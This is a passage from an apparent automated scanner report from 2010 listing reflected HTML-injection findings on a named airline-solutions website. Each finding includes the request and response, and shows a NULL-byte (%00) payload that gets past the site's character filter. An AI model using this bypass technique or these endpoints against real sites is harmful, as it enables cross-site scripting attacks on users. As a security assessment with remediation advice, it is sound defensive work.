Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321370; expires=Thu, 06-Oct-2011 09:36:20 GMT; path=/
Set-Cookie: exp_last_activity=1286375780; expires=Thu, 06-Oct-2011 09:36:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>db887c7418b=1">?%00fe06e<a>db887c7418b=1</a>
...[SNIP]...

3.15. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00940ea<a>08244679985 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 940ea<a>08244679985 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive?%00940ea<a>08244679985=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321532; expires=Thu, 06-Oct-2011 09:48:49 GMT; path=/
Set-Cookie: exp_last_activity=1286376528; expires=Thu, 06-Oct-2011 09:48:49 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>08244679985=1">archive?%00940ea<a>08244679985=1</a>
...[SNIP]...

3.16. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006fa94"><a>536da431cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa94"><a>536da431cfe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive?%006fa94"><a>536da431cfe=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:45:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321532; expires=Thu, 06-Oct-2011 09:45:35 GMT; path=/
Set-Cookie: exp_last_activity=1286376334; expires=Thu, 06-Oct-2011 09:45:35 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:45:40 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/archive?%006fa94"><a>536da431cfe=1">
...[SNIP]...

3.17. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b09a0"><a>625cef8b535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b09a0"><a>625cef8b535 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive/?%00b09a0"><a>625cef8b535=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321342; expires=Thu, 06-Oct-2011 09:31:32 GMT; path=/
Set-Cookie: exp_last_activity=1286375492; expires=Thu, 06-Oct-2011 09:31:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:31:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/archive/?%00b09a0"><a>625cef8b535=1">
...[SNIP]...

3.18. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/archive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0056b2f<a>e425790b66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2f<a>e425790b66b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/archive/?%0056b2f<a>e425790b66b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321342; expires=Thu, 06-Oct-2011 09:35:36 GMT; path=/
Set-Cookie: exp_last_activity=1286375736; expires=Thu, 06-Oct-2011 09:35:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:35:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 142748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>e425790b66b=1">?%0056b2f<a>e425790b66b=1</a>
...[SNIP]...

3.19. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008a5cb<a>8f6a559e1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a5cb<a>8f6a559e1b8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact?%008a5cb<a>8f6a559e1b8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321540; expires=Thu, 06-Oct-2011 09:47:48 GMT; path=/
Set-Cookie: exp_last_activity=1286376467; expires=Thu, 06-Oct-2011 09:47:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A8%3A%22%2Fsearch%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:48:09 GMT
Pragma: no-cache
Content-Length: 7149
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8f6a559e1b8=1">contact?%008a5cb<a>8f6a559e1b8=1</a>
...[SNIP]...

3.20. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00db425"><a>741209e189c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db425"><a>741209e189c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact?%00db425"><a>741209e189c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:43:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321540; expires=Thu, 06-Oct-2011 09:43:54 GMT; path=/
Set-Cookie: exp_last_activity=1286376234; expires=Thu, 06-Oct-2011 09:43:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A8%3A%22%2Fsearch%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:43:57 GMT
Pragma: no-cache
Content-Length: 7153
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/contact?%00db425"><a>741209e189c=1">
...[SNIP]...

3.21. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00666b7<a>50bee8d5c60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 666b7<a>50bee8d5c60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact/?%00666b7<a>50bee8d5c60=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321376; expires=Thu, 06-Oct-2011 09:47:26 GMT; path=/
Set-Cookie: exp_last_activity=1286376444; expires=Thu, 06-Oct-2011 09:47:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:48 GMT
Pragma: no-cache
Content-Length: 7191
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>50bee8d5c60=1">?%00666b7<a>50bee8d5c60=1</a>
...[SNIP]...

3.22. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004de66"><a>0fefd7fbea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4de66"><a>0fefd7fbea2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/contact/?%004de66"><a>0fefd7fbea2=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:43:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321376; expires=Thu, 06-Oct-2011 09:43:03 GMT; path=/
Set-Cookie: exp_last_activity=1286376183; expires=Thu, 06-Oct-2011 09:43:03 GMT; path=/
